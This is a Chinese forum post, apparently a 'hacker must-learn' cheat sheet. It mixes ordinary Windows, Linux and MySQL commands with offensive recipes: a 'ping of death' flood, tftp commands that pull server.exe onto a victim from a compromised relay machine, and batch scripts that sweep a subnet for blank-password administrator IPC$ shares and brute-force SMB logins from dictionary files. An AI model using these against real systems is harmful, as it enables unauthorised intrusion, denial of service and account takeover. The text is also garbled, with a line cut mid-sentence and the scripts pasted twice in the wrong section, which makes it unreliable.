黑客必学dos命令2
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]
数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之
ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,
ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装
目录的Support/tools文件夹内)
kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安
装的,在安装目录的Support/tools文件夹内)
del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除
只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏
、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文
件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
del /S /Q 目录或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和
下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名
复制文件和目录树,用参数/Y
将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe
登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二
进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模
式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口
用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二
进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码
Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理
性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程
序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的
存档,只读
,系统,隐藏属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时
间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和
时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以
冒号打头,例如:“:start”标签)
call 路径\批处理文件名从批处理程序中调用另一个批处理程序(更多说明见
call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息在屏幕上显示出信息
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
findstr
find 文件名
查找某文件
title 标题名字
更改CMD窗口标题名字
color 颜色值
设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿
、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、
D=淡紫、E=淡黄、F=亮白
prompt 名称
更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
print 文件名
打印文本文件
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名
)
format 盘符 /FS:类型
格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D:
/FS:NTFS
md 目录名
创建目录
replace 源文件 要替换文件的目录
替换文件
ren 原文件名 新文件名
重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名
显示文本文件的内容
more 文件名
逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,
并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);
解锁:doskey dir=
regedit /s 注册表文件名导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名导出注册表
cacls 文件名 参数显示或修改文件访问控制列表(ACL)——针对NTFS格式时
。参数:/D 用户名:设定拒绝某用户访问;/P 用户名erm 替换指定用户的访问
权限;/G 用户名erm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取,
W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定
d:\test.txt拒绝pub用户访问。
cacls 文件名查看文件的访问用户权限列表
REM 文本内容在批处理文件中添加注解
netsh 查看或更改本地网络配置情况
"Hello" aa.txt 在aa.txt文件中寻找字符串hello
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表);建表
drop database 库名;
drop table 表名;删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:
指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用
变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1
默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例
:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1
-1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"
指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}
command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时
,命令这间加:& 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行command
参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取
完为止{(set)为文件时,如(d:\pass.txt)时}。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G
/user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator
密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认
的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;
| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为
完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic
中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认
)。
|
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个
文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字设定延时的时间,范围0~180
秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要
终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进
程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标
识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,
无参数时就只列出当前的进程。
Linux系统下基本命令:要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G
/user:administrator | find "命令成功完成" >>test.txt
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator
密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认
的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;
| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为
完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic
中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认
)。
发表于 2023-9-25 19:43:41
发表于 2023-9-25 19:44:17
